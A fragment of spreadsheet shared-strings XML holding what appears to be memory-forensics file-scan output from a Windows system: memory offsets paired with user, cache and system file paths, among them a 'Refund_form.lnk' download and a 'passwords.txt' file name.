  </si>
  <si>
    <t>l4gdB9l-ElUJD</t>
  </si>
  <si>
    <t>7B1ogr-D2no</t>
  </si>
  <si>
    <t>q8Hhyz</t>
  </si>
  <si>
    <t>ngCQyhHTNxks[1].js_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfabfad0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\852CH0Q4\f</t>
  </si>
  <si>
    <t>[4].txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfac4038</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F6F92FBF4E8096C9272B135AF6</t>
  </si>
  <si>
    <t>140AA8_418367</t>
  </si>
  <si>
    <t>AD05204716E</t>
  </si>
  <si>
    <t>A20B8A</t>
  </si>
  <si>
    <t>CAD86C0AE_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfac4190</t>
  </si>
  <si>
    <t>140AA8_BDBDDB</t>
  </si>
  <si>
    <t>0D71E7A0E0C</t>
  </si>
  <si>
    <t>D47377</t>
  </si>
  <si>
    <t>59532F690_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfac4b10</t>
  </si>
  <si>
    <t>0010005.wid_x001B_[</t>
  </si>
  <si>
    <t>0xdfac5658</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0LDUT682\g</t>
  </si>
  <si>
    <t>pt[1].js_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfac7358</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Temp\FXSAPIDebugLogFile.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfac7460</t>
  </si>
  <si>
    <t>\Windows\System32\evr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfac7788</t>
  </si>
  <si>
    <t>2D351_CDEFBC6</t>
  </si>
  <si>
    <t>D1DC4BD82E9</t>
  </si>
  <si>
    <t>C88D25</t>
  </si>
  <si>
    <t>0DBD2A85_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfac8d00</t>
  </si>
  <si>
    <t>nnamed[5].jpg</t>
  </si>
  <si>
    <t>0xdfac8db8</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HZZ4R8FA\h</t>
  </si>
  <si>
    <t>qdefaultTVWQH</t>
  </si>
  <si>
    <t>DMK.jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfadc290</t>
  </si>
  <si>
    <t>\Windows\System32\COLORCNV.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfadd410</t>
  </si>
  <si>
    <t>0xdfaddcd0</t>
  </si>
  <si>
    <t>\Windows\System32\msmpeg2adec.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfae8038</t>
  </si>
  <si>
    <t>B2D351_0ACBBF</t>
  </si>
  <si>
    <t>45720E413D3</t>
  </si>
  <si>
    <t>7F7E25</t>
  </si>
  <si>
    <t>C9050A432_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfae8100</t>
  </si>
  <si>
    <t>B2D351_24225E</t>
  </si>
  <si>
    <t>DDAFC4A5767</t>
  </si>
  <si>
    <t>9FAA42</t>
  </si>
  <si>
    <t>C14C177F2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfae9220</t>
  </si>
  <si>
    <t>\Windows\System32\d2d1.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaea218</t>
  </si>
  <si>
    <t>B2D351_A5A821</t>
  </si>
  <si>
    <t>F40D22C0F84</t>
  </si>
  <si>
    <t>950AF0</t>
  </si>
  <si>
    <t>FEAAD5EC6_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaea748</t>
  </si>
  <si>
    <t>\Windows\System32\icsigd.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaea800</t>
  </si>
  <si>
    <t>348BED_C079DE</t>
  </si>
  <si>
    <t>21549DCD699</t>
  </si>
  <si>
    <t>C60FD4</t>
  </si>
  <si>
    <t>976DB25DF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaea918</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C1A13F869EFF8256EC419637</t>
  </si>
  <si>
    <t>2DA4EF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaeb038</t>
  </si>
  <si>
    <t>\Users\Wilfred\Contacts\Wilfred.contact_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaeb420</t>
  </si>
  <si>
    <t>\Users\Wilfred\Downloads\Refund_form\Refund_form.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaec1a0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E08363745838DCD53BF827861D</t>
  </si>
  <si>
    <t>E95F46_429A4F</t>
  </si>
  <si>
    <t>579D849F60D</t>
  </si>
  <si>
    <t>6E02023ED_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaec7a0</t>
  </si>
  <si>
    <t>348BED_EED204</t>
  </si>
  <si>
    <t>16AB14CA552</t>
  </si>
  <si>
    <t>85C847</t>
  </si>
  <si>
    <t>986B99435_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaeda80</t>
  </si>
  <si>
    <t>\Windows\System32\Query.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaee038</t>
  </si>
  <si>
    <t>0xdfaeff38</t>
  </si>
  <si>
    <t>\Users\Wilfred\Favorites\Links for United States\USA.gov.url_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaf0458</t>
  </si>
  <si>
    <t>\Users\Wilfred\Desktop\passwords.txt_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaf0678</t>
  </si>
  <si>
    <t>AB308D_9487BC</t>
  </si>
  <si>
    <t>0D4381A7CDE</t>
  </si>
  <si>
    <t>B9A8CC</t>
  </si>
  <si>
    <t>43F66D27C_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaf0c28</t>
  </si>
  <si>
    <t>B2D351_33A56A</t>
  </si>
  <si>
    <t>124B8529D67</t>
  </si>
  <si>
    <t>FBB768</t>
  </si>
  <si>
    <t>498950F64_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaf1288</t>
  </si>
  <si>
    <t>\Users\Wilfred\Favorites\Links\Web Slice Gallery.url_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfaf21a0</t>
  </si>
  <si>
    <t>\Users\Wilfred\Searches\Everywhere.search-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb00038</t>
  </si>
  <si>
    <t>Private Chara</t>
  </si>
  <si>
    <t>cter Editor</t>
  </si>
  <si>
    <t>.lnk_x001B_[</t>
  </si>
  <si>
    <t>0xdfb014e0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XCHWY7CN\s</t>
  </si>
  <si>
    <t>ddefault[2].j</t>
  </si>
  <si>
    <t>0xdfb016a8</t>
  </si>
  <si>
    <t>\Windows\System32\ntlanman.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb017d0</t>
  </si>
  <si>
    <t>0xdfb025b0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XCHWY7CN\h</t>
  </si>
  <si>
    <t>qdefaultAF0Y1</t>
  </si>
  <si>
    <t>00R.jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb02e50</t>
  </si>
  <si>
    <t>\Windows\System32\schtasks.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb03490</t>
  </si>
  <si>
    <t>AB308D_D93C57</t>
  </si>
  <si>
    <t>5AD9E9AF9B9</t>
  </si>
  <si>
    <t>5268A3</t>
  </si>
  <si>
    <t>CB953B5A1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb03678</t>
  </si>
  <si>
    <t>qdefaultBTQSI</t>
  </si>
  <si>
    <t>G4C.jpg_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb037f0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B45CAC94FDCB01BC19ED5A74B3</t>
  </si>
  <si>
    <t>41DCC8_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb03dd0</t>
  </si>
  <si>
    <t>\Users\Wilfred\Searches\Indexed Locations.search-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb049c8</t>
  </si>
  <si>
    <t>AB308D_592839</t>
  </si>
  <si>
    <t>A8569F831D0</t>
  </si>
  <si>
    <t>F2306A</t>
  </si>
  <si>
    <t>E4BB5C24B_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb04a80</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AD8FD0ACE08BC8D16E1F79C2F4</t>
  </si>
  <si>
    <t>754632_EAE201</t>
  </si>
  <si>
    <t>1FEEFFE666F</t>
  </si>
  <si>
    <t>A19657</t>
  </si>
  <si>
    <t>1AC5AA089_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb05830</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF</t>
  </si>
  <si>
    <t>5CE4A0_5043E0</t>
  </si>
  <si>
    <t>F5DF723415C</t>
  </si>
  <si>
    <t>9EECC2</t>
  </si>
  <si>
    <t>01C838A62_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb05998</t>
  </si>
  <si>
    <t>\Users\Wilfred\Favorites\Links\Suggested Sites.url_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb06088</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BEC6224B02D155A396218A2504</t>
  </si>
  <si>
    <t>F3EE0B_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb06140</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BC570EC0DE58335AFAF92FDC8E</t>
  </si>
  <si>
    <t>3AA330_F674EF</t>
  </si>
  <si>
    <t>8393404981F</t>
  </si>
  <si>
    <t>18A2BF7B5_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb06360</t>
  </si>
  <si>
    <t>3AA330_6CE6E5</t>
  </si>
  <si>
    <t>78B5C8485B4</t>
  </si>
  <si>
    <t>BE3C4D</t>
  </si>
  <si>
    <t>58E12F150_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb06580</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A9</t>
  </si>
  <si>
    <t>96E4A8_88B6AE</t>
  </si>
  <si>
    <t>015495C1ECC</t>
  </si>
  <si>
    <t>395D19</t>
  </si>
  <si>
    <t>C1DD02894_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb067a0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B90B117906B8A74C79D1BC450C</t>
  </si>
  <si>
    <t>2B94B1_A54F26</t>
  </si>
  <si>
    <t>A8A41DE52C2</t>
  </si>
  <si>
    <t>37D54D</t>
  </si>
  <si>
    <t>67F12793F_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb069c0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B7C322D57057B3593664F2D411</t>
  </si>
  <si>
    <t>D5C076_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb20038</t>
  </si>
  <si>
    <t>0xdfb220c0</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\ad_globals.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb22900</t>
  </si>
  <si>
    <t>43A9B5_BA1AB6</t>
  </si>
  <si>
    <t>C2BDFDF5779</t>
  </si>
  <si>
    <t>9E8116</t>
  </si>
  <si>
    <t>E4002D001_x001B_[0K_x001B_[66G</t>
  </si>
  <si>
    <t>0xdfb22c10</t>
  </si>
  <si>
    <t>0xdfb23100</t>
  </si>
  <si>
    <t>0xdfb26a70</t>
  </si>
  <si>
    <t>\Users\Wilfred\Favorites\Links\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb27298</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DE0101390D8E4B74E3DD39ACA5</t>
  </si>
  <si>
    <t>B00000_2D1896</t>
  </si>
  <si>
    <t>D81225CFE28</t>
  </si>
  <si>
    <t>A7B949</t>
  </si>
  <si>
    <t>E2CF7EF9A_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb27350</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\000F7F8FAB2D96E6F8CBD5C9A3</t>
  </si>
  <si>
    <t>B4EC90_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb279d0</t>
  </si>
  <si>
    <t>0xdfb27ad0</t>
  </si>
  <si>
    <t>0xdfb2baf8</t>
  </si>
  <si>
    <t>0xdfb2dd20</t>
  </si>
  <si>
    <t>iAB0002.001_x001B_[</t>
  </si>
  <si>
    <t>0xdfb2e780</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D080F8FD8CC1905DCE0E357DE7</t>
  </si>
  <si>
    <t>04D67D_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfb2e9a0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5002CEA66813C99A078E68B19</t>
  </si>
  <si>
    <t>5751FC_BBC589</t>
  </si>
  <si>
    <t>5E369B77AB1</t>
  </si>
  <si>
    <t>7BCF9C</t>
  </si>
  <si>
    <t>62F4BD10E_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc04100</t>
  </si>
  <si>
    <t>\Windows\inf\wfplwf.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc14038</t>
  </si>
  <si>
    <t>\Windows\inf\ndisuio.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc14690</t>
  </si>
  <si>
    <t>\Windows\inf\netmscli.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc14848</t>
  </si>
  <si>
    <t>\Windows\inf\netnwifi.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc14998</t>
  </si>
  <si>
    <t>\Windows\System32\esent.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc14b18</t>
  </si>
  <si>
    <t>\Windows\inf\netip6.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc14e50</t>
  </si>
  <si>
    <t>\Windows\inf\netbrdgs.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc15a80</t>
  </si>
  <si>
    <t>0xdfc15c60</t>
  </si>
  <si>
    <t>\Windows\System32\srrstr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc15e58</t>
  </si>
  <si>
    <t>0xdfc16570</t>
  </si>
  <si>
    <t>0xdfc17038</t>
  </si>
  <si>
    <t>0xdfc17870</t>
  </si>
  <si>
    <t>0xdfc17948</t>
  </si>
  <si>
    <t>0xdfc17b08</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\GAGP30KX.SYS.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc1c228</t>
  </si>
  <si>
    <t>0xdfc221a8</t>
  </si>
  <si>
    <t>0xdfc24c60</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\agilevpn.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc2a838</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_apppatch_1143992cbbbebcab.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc2a8f0</t>
  </si>
  <si>
    <t>\Program Files\Internet Explorer\iexplore.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc2ab30</t>
  </si>
  <si>
    <t>\ProtectedPrefix\NetWorkService_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc2abe8</t>
  </si>
  <si>
    <t>0xdfc2aca0</t>
  </si>
  <si>
    <t>\ProtectedPrefix\LocalService_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc2ad58</t>
  </si>
  <si>
    <t>0xdfc2ae10</t>
  </si>
  <si>
    <t>\ProtectedPrefix\Administrators_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc2aec8</t>
  </si>
  <si>
    <t>0xdfc2af80</t>
  </si>
  <si>
    <t>0xdfc32038</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc321a0</t>
  </si>
  <si>
    <t>\Windows\System32\DeviceCenter.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc32258</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sntsearch.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc33900</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc565c8</t>
  </si>
  <si>
    <t>0xdfc56800</t>
  </si>
  <si>
    <t>\$Extend\$RmMetadata\$TxfLog\$TxfLog.blf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc569c8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\videoprt.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc56dd0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\vga.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc5c730</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\cdrom.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc5caf0</t>
  </si>
  <si>
    <t>0xdfc5cc60</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\beep.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc5cdc0</t>
  </si>
  <si>
    <t>0xdfc5ce70</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\Dumpata.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc61328</t>
  </si>
  <si>
    <t>\Windows\System32\ieui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc613e0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\NetProjW.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc63330</t>
  </si>
  <si>
    <t>\Users\sshd_server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows E</t>
  </si>
  <si>
    <t>xplorer.lnk_x001B_[</t>
  </si>
  <si>
    <t>0xdfc633e8</t>
  </si>
  <si>
    <t>0xdfc634a0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\timedate.cpl.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc63dc0</t>
  </si>
  <si>
    <t>\Windows\System32\oleacc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc64218</t>
  </si>
  <si>
    <t>\Windows\System32\NlsData0021.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc64600</t>
  </si>
  <si>
    <t>0xdfc64ab0</t>
  </si>
  <si>
    <t>\Windows\System32\pmcsnap.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc64e08</t>
  </si>
  <si>
    <t>\Windows\System32\MdSched.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc65100</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\DeviceCenter.dll.mui_x001B_[0K_x001B_[46G</t>
  </si>
  <si>
    <t>0xdfc651b8</t>
  </si>
  <si>
    <t>\Windows\System32\OobeFldr.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc655c8</t>
  </si>
  <si>
    <t>\Windows\System32\SyncCenter.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc658c8</t>
  </si>
  <si>
    <t>\Windows\System32\mycomput.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc65b38</t>
  </si>
  <si>
    <t>0xdfc66408</t>
  </si>
  <si>
    <t>\Windows\System32\wdc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc666f0</t>
  </si>
  <si>
    <t>0xdfc667a8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\c</t>
  </si>
  <si>
    <t>hartbeat[1].j</t>
  </si>
  <si>
    <t>0xdfc66860</t>
  </si>
  <si>
    <t>\Windows\System32\dfrgui.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc66c00</t>
  </si>
  <si>
    <t>\Windows\System32\Speech\SpeechUX\sapi.cpl_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc67240</t>
  </si>
  <si>
    <t>\$Recycle.Bin\S-1-5-21-3583694148-1414552638-2922671848-1004\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc67708</t>
  </si>
  <si>
    <t>\Windows\System32\miguiresource.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc67b10</t>
  </si>
  <si>
    <t>\Windows\System32\rstrui.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc67f18</t>
  </si>
  <si>
    <t>\Windows\System32\msinfo32.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc680b0</t>
  </si>
  <si>
    <t>\Windows\System32\migwiz\wet.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc68270</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc68b20</t>
  </si>
  <si>
    <t>0xdfc68be8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Math Input Panel.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc68f80</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc69170</t>
  </si>
  <si>
    <t>\Program Files\Microsoft Silverlight\5.1.50918.0\agcore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc69568</t>
  </si>
  <si>
    <t>0xdfc69620</t>
  </si>
  <si>
    <t>\Windows\System32\WFS.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc69830</t>
  </si>
  <si>
    <t>\Windows\System32\FXSSVC.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc69c78</t>
  </si>
  <si>
    <t>0xdfc69e38</t>
  </si>
  <si>
    <t>\Windows\System32\msgsm32.acm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6a420</t>
  </si>
  <si>
    <t>\Windows\System32\iscsicpl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6a4f0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Windows\WER\ERC_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6a6e0</t>
  </si>
  <si>
    <t>\Windows\Temp\MpCmdRun.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6a798</t>
  </si>
  <si>
    <t>0xdfc6b038</t>
  </si>
  <si>
    <t>\Program Files\Internet Explorer\ieproxy.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6baa0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6c7a0</t>
  </si>
  <si>
    <t>\Windows\System32\batmeter.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6cb78</t>
  </si>
  <si>
    <t>\Windows\System32\filemgmt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6cf80</t>
  </si>
  <si>
    <t>\Windows\System32\wsecedit.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6d120</t>
  </si>
  <si>
    <t>\Windows\System32\cscobj.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6d420</t>
  </si>
  <si>
    <t>0xdfc6d528</t>
  </si>
  <si>
    <t>\Windows\Media\Windows Logon Sound.wav_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6db40</t>
  </si>
  <si>
    <t>0xdfc6e348</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6e8f0</t>
  </si>
  <si>
    <t>0xdfc6ec38</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6ef80</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6f5f0</t>
  </si>
  <si>
    <t>0xdfc6f6a8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini_x001B_</t>
  </si>
  <si>
    <t>0xdfc6f9d8</t>
  </si>
  <si>
    <t>0xdfc6fdb0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc6ff40</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc70038</t>
  </si>
  <si>
    <t>0xdfc70108</t>
  </si>
  <si>
    <t>\Windows\System32\networkexplorer.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc70558</t>
  </si>
  <si>
    <t>0xdfc70980</t>
  </si>
  <si>
    <t>0xdfc70ef0</t>
  </si>
  <si>
    <t>0xdfc71038</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenSSH for Windows\OpenSSH for Windows Web</t>
  </si>
  <si>
    <t>Site.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc71128</t>
  </si>
  <si>
    <t>0xdfc71290</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5B9763FB83E74617D0DB589928</t>
  </si>
  <si>
    <t>00F69B_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc71e88</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc72220</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Temp\BGInfo.bmp_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc730c0</t>
  </si>
  <si>
    <t>0xdfc73228</t>
  </si>
  <si>
    <t>0xdfc73d88</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc74038</t>
  </si>
  <si>
    <t>\Windows\System32\thumbcache.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc74210</t>
  </si>
  <si>
    <t>0xdfc742c8</t>
  </si>
  <si>
    <t>\Windows\System32\NlsLexicons0021.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc74c78</t>
  </si>
  <si>
    <t>4\663c14a8-e6</t>
  </si>
  <si>
    <t>e1-4bb2-85d</t>
  </si>
  <si>
    <t>d-e52d</t>
  </si>
  <si>
    <t>a463c2f7_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc74da0</t>
  </si>
  <si>
    <t>\Windows\System32\riched32.dll_x001B_[0K_x001B_[54G</t>
  </si>
  <si>
    <t>0xdfc75348</t>
  </si>
  <si>
    <t>0xdfc762c8</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc76818</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\umpo.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc76e10</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\de</t>
  </si>
  <si>
    <t>0xdfc77b80</t>
  </si>
  <si>
    <t>\Windows\System32\oleaccrc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc78168</t>
  </si>
  <si>
    <t>\Windows\System32\rasdlg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc78220</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5IDSBAN9\o</t>
  </si>
  <si>
    <t>bUserSync[1].</t>
  </si>
  <si>
    <t>htm_x001B_[0K</t>
  </si>
  <si>
    <t>0xdfc78490</t>
  </si>
  <si>
